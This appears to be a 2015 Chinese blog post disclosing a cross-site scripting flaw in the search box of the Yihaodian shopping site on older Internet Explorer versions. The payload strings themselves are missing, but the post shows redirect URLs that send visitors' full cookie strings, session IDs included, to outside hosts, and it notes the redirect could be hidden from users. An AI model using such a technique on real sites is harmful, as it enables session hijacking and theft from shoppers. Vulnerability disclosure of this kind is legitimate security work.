发现一号店首页曝出重大XSS漏洞,在IE8,IE9,IE10上均有此漏洞
2015-10-12 22:49
363 查看
发现一号店首页曝出XSS漏洞,在IE8,IE9,IE10上均有此漏洞
1.进入一号店首页:
http://www.yhd.com2.搜索第一个字符串或者第二个字符串:
第一个:第二个:
(这里说明下,第一个字符和第二个字符都是单引号,第三个字符是双引号,接着!--)
搜索页面:
3.在IE8,IE9,IE10上按下搜索键
页面跳转到:http://wz.cn/?p=test_cookie=1; abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=2.40580330.87011629.1444660093687.1444660093687.1444660713109; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=22.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=18373150176C65FE11EB46BA041B0729
或者:
http://wz0.cn/?p=abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=3.40580330.87011629.1444660093687.1444660713109.1444661000125; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=23.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=B1DE4F8D449DC5B8C133259F19339223
注:当页面跳转到第三方网站后,存储完用户信息后,可以再跳到一号店的首页,如果这个过程速度快,用户可能没有察觉到,当然360卫士是拦截了第一个,不过第二个好像没有拦截。
相关文章推荐
- javaweb学习笔记之关于分层结构的初步理解
- Android adb.exe程序启动不起来,如何处理
- X86-64寄存器和栈帧
- Linux上安装Nginx及常用命令
- 怎么理解angularjs中的服务?
- swift基础--变量
- 文件的copy(一次性完成数据的传递 )
- Android学习记事(一)
- cocos2dx lua项目学习一 创建lua项目
- 数据库的相关操作
- 设计模式--创建者模式
- inline(内联元素)和block(块级元素) 的区别
- AbstractFactory(PeopleSkin)
- 验证码图片生成类
- 【IOS 开发学习总结-OC-44】★★ios开发之UI控件——文本框与多行文本控件(彩蛋——上拉刷新一般实现代码)
- 《计算机网络 :自顶向下方法》第5章 链路层和局域网
- 人生杂谈---一次由吃杂酱面引发的感想
- HDU 2059 龟兔赛跑
- sed用法
- Machine Learning-Andrew Ng-week3